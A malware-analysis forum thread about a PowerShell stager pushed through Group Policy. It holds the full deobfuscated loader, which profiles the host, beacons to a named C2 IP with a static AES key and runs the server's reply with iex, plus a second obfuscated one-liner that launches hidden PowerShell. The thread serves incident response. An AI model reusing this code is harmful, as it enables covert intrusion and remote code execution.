
 #31196  by 4everyone
 Sun Jan 14, 2018 7:46 am
Happy New Year Folks !

I'm dealing with a situation where a scheduled task is being pushed from the Domain Controller to workstations. The task runs wscript plus PowerShell with a download link that is visible in the scheduled task's script.

Link is - http://192.96.206.191:9097/static/ka7ds ... AHSGA656gh

The link above serves some code. I'm not sure what it is capable of or what the script actually does. Can someone tell me what the purpose of this script is? Thanks in advance for your help.

Thanks
4Everyone
 #31204  by N3mes1s
 Mon Jan 15, 2018 5:18 pm
Hello.
This is pretty interesting. It appears to be a PowerShell reconnaissance/stager script (I don't know whether it is a known family and don't have time to check). After peeling off multiple layers of Invoke-Obfuscation and following several further downloads from the same IP, this is the resulting code. In short: it generates an RSA key pair, posts the public key to the C2 over HTTPS with certificate validation disabled, receives an RSA-encrypted AES session key, sends a host/adapter/installed-software inventory (the software regex targets browsers, tax-preparation products, security software, QuickBooks, KeePass, FTP/SSH clients and Outlook), and then decrypts whatever the server returns and runs it with `iex` — so it is a loader, not just recon; what it ultimately does depends on what the C2 serves.

At this stage it is fairly self-explanatory — just read the function names :)
# ---------------------------------------------------------------------------
# Deobfuscated stager as recovered from the sample. The code below is left
# verbatim (it is the artifact under analysis); the '#' lines are analyst notes.
#
# Positional arguments (see the call at the bottom of the listing):
#   $args[0] -> $Serv  C2 base URL
#   $args[1] -> $SK    static AES key; its raw ASCII bytes are used as the key
#   $args[2] -> $USAG  User-Agent string sent with every request
#
# Flow: generate an RSA key pair -> POST the public key (AES-CBC under $SK) to a
# random path on $Serv -> RSA-decrypt the reply into a session key plus a
# one-character flag -> POST host/adapter/software inventory (flag 0) or a short
# "OK" beacon (otherwise), AES-CBC under the session key -> AES-decrypt the reply
# with the session key and run it with iex -> hand off to federerfegegfeg, which
# is not defined in this listing (presumably supplied by the stage just run).
# ---------------------------------------------------------------------------
function GsdsetWweter {
    $Serv = $args[0]
    $SK = $args[1]
    $USAG = $args[2]
    $Null = [Reflection.Assembly]::LoadWithPartialName("System.Security");
    $Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");
    # Every error is swallowed: a failed request or decrypt surfaces nowhere.
    $ErrorActionPreference = "SilentlyContinue";
    # ASCII encoder reused for key material, the public-key XML and the beacon text.
    $e=[System.Text.Encoding]::ASCII;
    # Bot identifier: lower-case hex MD5 of lower-case(user name + machine name +
    # BIOS serial number). Stable across reboots, so a host re-registers under
    # the same ID; useful for correlating beacons from one machine.
    function Get-SysID($HashName = "MD5"){
        [string]$ret = ""
        $hd = gwmi win32_bios
        $ret = $hd["SerialNumber"].ToString()
        [string]$String = $([Environment]::UserName +[Environment]::MachineName + $ret).ToLower();
        $StringBuilder = New-Object System.Text.StringBuilder 
        [System.Security.Cryptography.HashAlgorithm]::Create($HashName).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($String))|%{ 
            [Void]$StringBuilder.Append($_.ToString("x2")) 
            } 
            # Function-local $e; it shadows the outer ASCII encoder only in here.
            $e = $StringBuilder.ToString().ToLower()
            $e
        }
  # Joins the VALUES of a hashtable with ';'. A plain @{} hashtable has no
  # guaranteed enumeration order, so the field order inside each adapter record
  # of the beacon is not fixed. $output starts out undefined ($null).
  Function HasGet-Bretring($ht) { 
  $first = $true
  foreach($pair in $ht.GetEnumerator()) { 
    if ($first) 
    {
       $first = $false
    } 
    else 
    {
       $output += ';'
    }
    $output+="{0}" -f $($pair.Value)
   } 
   $output
  }

 # One record per network adapter with NetConnectionStatus=2 (connected):
 # adapter Name, MAC, DeviceID and the IPAddress list of the related
 # Win32_NetworkAdapterConfiguration.
 function Get-workconfig {
  Get-WmiObject Win32_NetworkAdapter -Filter 'NetConnectionStatus=2' |
    ForEach-Object {
      $result = 1 | Select-Object Name, IP, MAC, ID
      $result.Name = $_.Name
      $result.MAC = $_.MacAddress
      $result.ID = $_.DeviceID
      $config = $_.GetRelated('Win32_NetworkAdapterConfiguration') 
      $result.IP = $config | Select-Object -expand IPAddress
      $result
    }
 
}
   
    # Builds the pipe-delimited inventory sent on first contact:
    #   domain|user|machine|<adapters>|OS name|is-admin|WxH|process|pid|PS major|arch|timezone|last boot
    # <adapters> is one DeviceID/IP/MAC/Name record per connected adapter
    # (value order follows hashtable enumeration), each terminated by '!'.
    function Get-Sysinfo {     
        $str = [Environment]::UserDomainName+'|'+[Environment]::UserName+'|'+[Environment]::MachineName; 
        $string = ""
        foreach($c in Get-workconfig){
            [string]$lanname = $c.Name; [string]$macadr = $c.MAC; [string]$ID = $c.ID
            # Dead assignment: $p is never defined and $ip is overwritten on the next line.
            $ip = @{$true=$c.IP[0];$false=$p.IP}[$c.IP.Length -lt 6];
            # First address of the adapter, or 0.0.0.0 when it has none.
            [string]$ip = $c.IP[0]; if(!$ip -or $ip.trim() -eq '') {$ip='0.0.0.0'};
            $lanconf = @{
            id = $ID 
            ip = $ip;
            mac =  $macadr; 
            name = $lanname;
            }
           $string += HasGet-Bretring $lanconf 
           $string += "!"
        }

        $o = (Get-WmiObject Win32_OperatingSystem)        
        $str += "|$string";
        # Win32_OperatingSystem.Name is "caption|boot partition|..."; keep the caption only.
        $str += '|' +$o.Name.split('|')[0];
        # A user name of "system" is reported as elevated without a role check
        # (e.g. a scheduled task running as SYSTEM); anyone else is checked
        # against the Administrators role.
        if(([Environment]::UserName).ToLower() -eq "system"){
            $str += '|True'
        }
        else{
            $str += '|'+ ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
        }
        # Screen geometry (a crude sandbox/VM tell); only the last enumerated
        # screen's width/height survive the loop.
        [void] [Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
        $Screens = [system.windows.forms.screen]::AllScreens
        foreach ($Screen in $Screens) {                       
            $Width  = $Screen.Bounds.Width            
            $Height  = $Screen.Bounds.Height 
        }
        $str += '|' + "$Width`x$Height"
        # Host process name and PID (tells the operator what the stager runs inside).
        $n = [System.Diagnostics.Process]::GetCurrentProcess()
        $str += '|'+$n.ProcessName+'|'+$n.Id
        $str += '|' + $PSVersionTable.PSVersion.Major
        $str += '|' + $ENV:PROCESSOR_ARCHITECTURE
        $str += '|' + (gwmi win32_timeZone -ComputerName $env:ComputerName).caption 
        $str += '|' + $o.ConvertToDateTime($o.LastBootUpTime)
        $str
    }
    
# Random request path: $args[0] letters drawn without replacement from an
# alphabet that omits n, q and w, plus a random .php/.jsp/.asp extension.
# Every request hits a different URI, so there is no fixed path to match on;
# the letter set and the 9/13-character lengths used below are the stable part.
function getlisturi{
    $RandName = -join("abcdefghijklmoprstvuxyz".ToCharArray()|Get-Random -Count $args[0]);$ar = @('php','jsp','asp') | Get-Random;
    $RandName + '.' + $ar
    }

    # Installed-software inventory read from the Uninstall registry keys (native
    # and Wow6432Node) through the remote-registry API pointed at the local
    # machine. Only DisplayNames matching $NameRegex are emitted, one "<name>;"
    # string per hit: browsers, a long list of tax-preparation products
    # (Lacerte, ProSeries, Drake, TaxSlayer, ...), AV/firewall/Defender,
    # QuickBooks, "keypass", ftp/ssh and Outlook. -match is case-insensitive, so
    # short alternatives such as TAX and Anti match broadly. A key that cannot
    # be opened is skipped silently.
    function Get-Soft {
    param (
        [Parameter(ValueFromPipeline=$true)]
        [string[]]$ComputerName = $env:COMPUTERNAME,
        [string]$NameRegex = '(Opera|Firefox|Chrome|TAX|Lacerte|OLT|ProSeries|Ultratax|Drake|Taxslayer|ProTaxPro|Taxwise|Avast|ESET|Malwarebytes|McAfee|Norton|Panda|Sophos|Webroot|Bitdefender|Symantec|Trust|EICAR|Virus|Firewall|Defender|Secury|Anti|Comodo|Kasper|quickbooks|keypass|ftp|ssh|Outlook)'
    )
    foreach ($comp in $ComputerName) {
        $keys = '','\Wow6432Node'
        foreach ($key in $keys) {
            try {
                $apps = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine',$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall").GetSubKeyNames()
            } catch {
                continue
            }
            foreach ($app in $apps) {
                $program = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine',$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall\$app")
                $name = $program.GetValue('DisplayName')
                # Reset per app, so each emitted item is a single "name;".
                $str = ''
                if ($name -and $name -match $NameRegex) {
                    $str += $name + ';'
                    $str
                }
            }
        }
    }
}
            # --- Stage 1: key exchange ---------------------------------------
            # AES-CBC, falling back to RijndaelManaged on older .NET.
            try {
                $FirstAES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;         }
            catch {
                $FirstAES=New-Object System.Security.Cryptography.RijndaelManaged;
            }
    # IV from Get-Random (not a CSPRNG). Key = raw ASCII bytes of $SK; the value
    # passed at the call site is 32 characters, i.e. AES-256.
    $FirstIV = [byte] 0..255 | Get-Random -count 16;$FirstAES.Mode="CBC";
    $FirstAES.Key=$e.GetBytes($SK);
    $FirstAES.IV = $FirstIV;
    # 2048-bit RSA key pair created in the machine key store. NOTE(review): with
    # an explicit CspParameters the key container may be persisted on disk in
    # the machine key store -- worth checking as a forensic artifact.
    $csp = New-Object System.Security.Cryptography.CspParameters;
    $csp.Flags = $csp.Flags -bor [System.Security.Cryptography.CspProviderFlags]::UseMachineKeyStore;
    $rs = New-Object System.Security.Cryptography.RSACryptoServiceProvider -ArgumentList 2048,$csp;
    # Export only the public half as XML ($False), then build IV || AES-CBC(xml) under $SK.
    $rk=$rs.ToXmlString($False);$ib=$e.getbytes($rk);
    $eb=$FirstIV+$FirstAES.CreateEncryptor().TransformFinalBlock($ib,0,$ib.Length); 
    # Bot ID, base64-encoded twice, rides in a cookie on the request.
    $BotIDXor= Get-SysID;
    $EncodedText =[Convert]::ToBase64String($e.getbytes($BotIDXor));
    $EncodedText2 =[Convert]::ToBase64String($e.getbytes($EncodedText));
  # $wc is never set in this function, so a fresh WebClient is created unless a
  # caller scope already defined one.
  if(-not $wc){
        # Disables TLS certificate validation process-wide, so any certificate
        # on the C2 is accepted (the server is an IP literal, see the call
        # site). The system proxy is used with the logged-on user's default
        # credentials, which gets the traffic through authenticated proxies.
        [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
        $wc=new-object system.net.WebClient;
        $wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
        $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
    }
    $wc.Headers.Add("User-Agent",$USAG);
    # Non-standard cookie syntax: "SESSIONID:<value>" with a colon instead of
    # '='. Together with the hard-coded User-Agent this is a usable network
    # signature.
    $wc.Headers.Add("Cookie","SESSIONID:$EncodedText2");
    # Registration POST to a random 9-letter path on the C2.
    $raw=$wc.UploadData($Serv + "/" + $(getlisturi 9),"POST",$eb);
    # Debug output left in the sample (only visible when a console is attached).
    write-host "STAGER GET raw   "  $raw
    # The reply is RSA-encrypted to the public key just sent ($false = PKCS#1
    # v1.5 padding, no OAEP). Plaintext = session key followed by a
    # one-character flag; the key length is whatever the server chose.
    $de=$e.GetString($rs.decrypt($raw,$false));
    $key=$de[0..($de.length-2)] -join '';
    $k=$de[$de.length-1] -join '';
  # --- Stage 2: beacon -------------------------------------------------------
  # Flag 0 = first contact: full host inventory plus software list. Get-Soft
  # returns an array, so its items are joined with the default $OFS (a space)
  # when concatenated. Any other flag: short "OK|is-admin|pid" beacon.
  if ($k -eq 0) {
    $str1 =  Get-Sysinfo;
    $str2 =  Get-Soft;
    $str = $str1 + '|' + $str2
    }
  else{$str = 'OK'+ '|' + ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") + '|' + ([System.Diagnostics.Process]::GetCurrentProcess()).id}
    # AES-CBC under the session key (no RijndaelManaged fallback this time);
    # again IV || ciphertext, POSTed to a random 13-letter path.
    $SecondAES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;
    $SecondIV = [byte] 0..255 | Get-Random -count 16;
    $SecondAES.Mode="CBC"; $SecondAES.Key=$e.GetBytes($key); $SecondAES.IV = $SecondIV; 
    $ib2=$e.getbytes($str);
    $eb2=$SecondIV+$SecondAES.CreateEncryptor().TransformFinalBlock($ib2,0,$ib2.Length);
    # User-Agent is re-added for the second request; the Cookie header is not.
    $wc.Headers.Add("User-Agent",$USAG);
    $raw=$wc.UploadData($Serv+ "/" + $(getlisturi 13),"POST",$eb2);
# --- Stage 3: payload --------------------------------------------------------
try {$AES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;}
catch {$AES=New-Object System.Security.Cryptography.RijndaelManaged;}
    $AES.Mode="CBC";
    # Reply layout: first 16 bytes are the IV, the rest is AES-CBC ciphertext
    # under the session key.
    $IV = $raw[0..15];$AES.Key=$e.GetBytes($key);$AES.IV = $IV;
    $shelles = [System.Text.Encoding]::ASCII.GetString($($AES.CreateDecryptor().TransformFinalBlock($raw[16..$raw.Length],0,$raw.Length-16)))
    # The decrypted server response is executed as PowerShell. This is where
    # the real payload arrives; nothing in this listing constrains what it does.
    iex $shelles
    # Anti-forensics: key material and buffers are nulled and the GC forced so a
    # later memory dump has less to offer. $key, $wc and $EncodedText2 are
    # deliberately kept for the hand-off below.
    $FirstAES=$null;$BotIDXor=$null;$rs=$null;$eb2=$null;$raw=$null;$IV=$null;$str=$null;$ib2=$null;$SecondAES=$null;$AES=$null; $SecondIV=$null;$shelles= $null;
    $Error.Clear()
    [GC]::Collect()
    [GC]::WaitForPendingFinalizers()
    # Hand-off. federerfegegfeg is not defined anywhere in this listing
    # (presumably defined by the stage executed via iex above). Arguments:
    # session key, the cookie header value, C2 base URL, a '|'-separated pair of
    # "fallback URI list" and User-Agent, is-admin, PowerShell major version.
    federerfegegfeg $key "SESSIONID:$EncodedText2" $Serv '/sale/getinfo.php,/getnews.asp,/update/news.html,/defender/main.jsp,/mains.asp|Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 Edge/12.0' $([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") $PSVersionTable.PSVersion.Major
    }
  # Entry point / IOCs: C2 base URL https://192.96.206.191 (same host as the
  # download link in the original post, which used port 9097 over plain HTTP),
  # the static AES key (32 ASCII characters, i.e. AES-256 once passed through
  # $e.GetBytes) and the User-Agent string the C2 expects.
  GsdsetWweter 'https://192.96.206.191' ':nP&2[Ia+4E7)V~z.M5pvdrsXle$]!U(' 'Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 Edge/12.0'
https://ghostbin.com/paste/83av7
 #31212  by 4everyone
 Fri Jan 19, 2018 6:04 pm
Hi N3mes1s,

I found another obfuscated script being run through Group Policy. Could you please decode this one as well, so that I can understand what it does?
# Second sample (one single statement; the line breaks below are forum wrapping
# of one long string -- e.g. "73<1" at the end of the first line and "33L" at
# the start of the next are one octal value, 133).
#
# Structure: `. ( $VerbosePreference.ToString()[1,3]+'X' -join '' )` takes the
# characters at index 1 and 3 of the preference string ('i' and 'e' at its
# default value "SilentlyContinue"), appends 'X' and dot-sources the result,
# i.e. `. ieX (<payload>)`. The payload is a list of octal character codes
# separated by the characters ; } z b P j < L g h, which is split on each of
# them, converted with [Convert]::ToInt16(x, 8), cast to [char] and re-joined.
#
# Decoding the codes by hand: the text defines a function Get-NewProc that
# starts a hidden powershell.exe (CreateNoWindow, WindowStyle 'Hidden') with
# '-noexit -nologo -noprofile -NonInteractive -EncodedCommand <base64>', then
# 'start-sleep -s 5' and 'exit'. The base64 argument begins with 'aQBlAHgA',
# which is UTF-16LE "iex " -- a further layer. Decode it offline in an isolated
# VM; do not run the statement.
. ( $VERbosePREFeREnCe.tosTrINg()[1,3]+'X'-JOiN'') ( ( '146P165h156z143}164<151z157b156;40j107P145}164}55<116;145<167<55<120b162h157L143z173g15}12b160L141b162g141g155P40P50P133L163g164;162h151z156z147;135g44}144j141;164g141P51j15b12b44P120j157P167z145<162g163<150b145g154<154j105<170;145}40g75}40}47}160z157<167b145h162}163P150g145;154j154g56<145}170P145<47L73<40g15b12z164;162h171<40P173;44<160b163}151L40L75z40z116;145<167j55h117j142j152P145L143L164}40b123<171b163z164;145}155h56<104z151b141L147L156j157h163j164h151b143L163z56}120L162z157}143P145j163;163j123z164g141<162b164;111}156P146}157<73;44h160}162z157j143j75;156z145;167;55h157g142<152z145L143<164<40b123}171<163h164;145g155j56P104P151P141j147}156P157;163L164g151P143<163z56}120g162g157}143j145<163b163P73<44h160j163b151h56L103j162j145z141;164h145}116}157g127<151;156L144h157j167<40<75}40;44;164P162b165;145L73}44;160;163g151h56;127h151h156;144z157g167}123j164P171}154z145g40L75b40g47P110}151P144L144L145;156b47z73<44<160P162z157j143g56<123L164;141;162;164z111j156j146;157}40P75g40j44P160z163;151j73b44h160P162P157L143P56;123b164P141}162}164;111<156<146}157L56b106b151j154;145<116j141g155<145z40g75g40L44j120}157b167L145P162;163z150<145b154P154h105b170b145b73h44g160j162}157g143h56h123<164j141j162h164j111h156P146b157}56j101z162b147g165;155}145}156h164<163}40;75P40z47;55;156b157h145P170L151j164g40<47<40}40j40}53z40j47}55b156j157L154<157h147j157<40h47h53j47j55L156L157b160j162j157;146}151z154z145P40P47;53z47z55z116g157;156h111b156b164P145;162}141;143h164<151;166}145g40}47;53P40<47j55<105b156<143L157P144h145L144h103b157j155<155L141g156L144<40L47z53h40g44g144;141j164g141g73j44h160;162b157}143b56g163b164g141P162h164<50g51b174b40<117g165j164g55L116h165<154h154g40P73;175}15g12z143z141z164g143h150g40j173b40}44}137j56j105<170b143b145P160;164j151;157<156j56b115;145j163g163g141;147;145z73P175P15b12L146L151b156h141L154j154z171<173j44<144}141h164h141<40g75g40h44j156P165}154z154P73b133P107P103<135z72<72b103<157<154}154}145b143g164h50L51b73<1
33L107j103;135z72b72b127;141}151L164<106z157b162j120b145L156h144;151g156L147h106<151g156;141j154j151b172j145b162g163h50;51;73}175P175<15;12P107;145b164j55L116j145g167b55P120<162b157h143b40<55}144<141z164L141h40b47h141h121z102z154P101j110h147L101b111;101j101<153b101P103P147g101<127z167j102j123<101b107b125<101<122j147h102j144h101L103z64L101j121<121L102<124<101g106b115z101b132}121L102b164;101h107h111b101;124<101b102b65}101h103;64b101<122;167}102h154<101j106b121g101P126b101b102;132g101P106g101b101g122L121g101}157P101<103z143z101b125;167b102j65<101z110h115b101;144;101}102j154g101P107j60h101j114g147b102;116g101b107}105z101j142}147<102P150j101}107b143h101z132z121}102g164L101}107;125j101j142b147P102P60<101;103}64<101g121;121h102j61}101j110b121L101g142z167L102}164P101z107h105}101b144z101}102g160h101<107j70j101;142z147L101j165L101j105P105b101g142<121h102}172g101b107b153h101z126P121b102}60}101<107}153<101h142z101b102b172b101;103<143P101z113<121b102P70L101b104z70j101<145P167L101<153j101L106P70;101j146L121P102b70<101j103<125j101P145g167L101L153j101j106P70<101g114g147L102h110}101}105P125;101}144}101<102g107j101;107}153h101b132<121j102L163P101g105L121L101<113j101j101L156L101g107L105g101b142z121P102L172j101b107L153j101h123g121<102b165<101j107<153h101h144<101z102;107h101j107<105L101<141b121L102<163g101;107}125;101}132z101P101b156z101P103;167<101}112<167P102L117b101<107z70;101;142P147L102}121P101z110b125L101L131<147j102;163P101b107h153b101b131b167L101P163<101z106L115L101;144g101;102j150b101j110j121z101h141g121P102b152}101}103g143b101b113h121L101}165<101<106<115}101<122<121L102}125<101;106;131z101z121h121P102b115;101h106P125b101z122P121;101L157}101P103h121;101j124h147j102;126P101h105g167g101}142<101b101g163P101<103}121;101j126}101L102z123;101}110;125h101b122b121L101;160b101;110z60h101h117z167b102<142g101P106z115g101P145g121<102g172h101L110<121P101j132h121;102P164b101g103b64P101}124P147L102L154<101}110L121}101j114<147b102<124z101g107;125P101L143g147z102;62<101j107}153L101<131P167j102b1
54h101z106b101;101z142b167g102z160j101b107b64;101P144z101b102z116b101L107;105b101L142<147z102j150b101P107P143<101;132h121b102P171<101g106<60}101j117P147}101h66L101}106;115L101L132b121P102P171g101P110z131b101z132j121L102}171}101z105h115P101b132z121z102;171P101h110<121z101b141L121h102P155;101h107j153b101z131;167z102b150g101h110;121b101;132z121L102;127g101L107;105}101g142j101g102z160<101g107b121L101L131P121L102j60j101;107z153b101h142g167;102P165j101;105j115<101b131L121<102<163h101j107}167g101b131j147b102z150}101L107j115P101L141P167b101}71j101P110g163b101L112<101b102}60L101}110z111;101}144;121}102<154h101L110P60h101h117b167z102j142;101z106;115;101;145b121b102L172z101L106}121h101j122L121g102P164<101;103<64h101;124;147;102L154;101z110L121P101z114z147}102g124;101<107P125h101L125L147h102<62<101P105P153g101;121j167h102;154}101j106}101g101;142g167;102}112h101z107P64b101<144}101z102z116}101}105}105h101}142h147L102z150g101}105<143h101z122j121j102h171P101j106j60P101b117h147h101;66P101}105<125P101g145z101L102j167;101}107b125}101g131}167L102<60j101}104}105<101h115j101g101g167z101z105h115z101}142z167z102;165h101g106h121}101}123j121j102z117b101b110g125P101j122z121P101<71<101j104<101j101b117;167b101P147}101<103g147}101P124j147<102h154;101}110;143g101L114h121h102z120L101<107}111h101g141L147j102z154}101b107L115<101j144z101g101;147}101j106P115b101z145L121z102L172b101g110<121<101P132g121}102}164P101b103<64j101L124;147z102;154z101j110;121}101L114}147z102;130g101L107P125;101}131g147P102;104L101L107;167h101b141}121b102g154;101b107P64L101}144L101b101L160b101j103j64}101}122;101h102z166}101<110b143h101}124<147b102j115<101<105L70}101P131;121z102P153j101}106<115<101L144P101j102;123z101P105z153L101h124;147g102z110b101h103h147L101z112g167z102;157b101j110b121j101g144L101L102L167L101L110L115b101g117L147h101z166L101z103z70b101;115<121h101}65P101j104z111}101}114}147h101z65g101L104z131}101b114g147<101b171;101z104}101j101h116j147h101P165z101z104z105}101z117j121P101j170z101;103P70P101<112g167;101g162;101
z103;101}101z112}101L101b157P101<103b60P101P141L147g102}166z101L107;153h101;142g147g101g157P101;103}143z101b121}121j102L103;101;105j115P101}122h101P102b106L101L105h131b101P122h167g102g111j101b105j163}101g124P101P102j116P101b105b64<101z142<147L102<166g101P110;101h101j143;121b102j171g101b110}115h101h144L101g102<62}101;110h125P101j144b167z102<64g101b110P153z101j145b147<101j156z101;103g64g101<126P101<102}166j101;105b115g101g141P101g102b150j101z110P111b101<121;121}102L171;101L110P111;101j131h121z102j65<101h103z147j101P113;121h102<70g101b105g143h101h132z121h102<60P101z103j60}101z125g147g102P150j101z107h64L101g132z101g102L166b101P107P60L101L111j101;101}164g101;105;115L101<142;167h102z61z101}107;64;101}144b101;101<147g101z104z147P101j113;121h101}160L101}103<163;101;112g167h101L165P101L103}143}101j113b167b101j147g101<103<121j101z113;101h102g101z101;103g147<101P112h167b102b167L101;107;147j101}143h101L101<156j101P103g167b101g112<167<102<161b101P110P115j101h143L101g101L156P101<103<167L101}112j167L102L150P101L110h115z101;143z101<101z156}101L103b153h101;111j101z102}70P101;103<101P101b122j167b102<154g101g110<121b101j114h121}102;123P101g107L105;101g142L147<102<153<101j107P70}101P142g121z101h160z101;103g153P101}113g121g101z75<47<15g12L163}164P141z162L164<55L163}154h145b145b160<40;55g163h40P65}15}12g145j170P151b164'-SPLiT ';'-SplIt'}' -sPlit'z' -Split 'b'-SPLiT 'P' -SPlit 'j'-SpliT '<' -sPLiT'L' -SpLiT'g' -SPlIT 'h'|FoREaCH{ ( [ConVERt]::tOINT16(( [STrInG]$_ ) ,8 ) -aS [CHar])} ) -jOiN'' )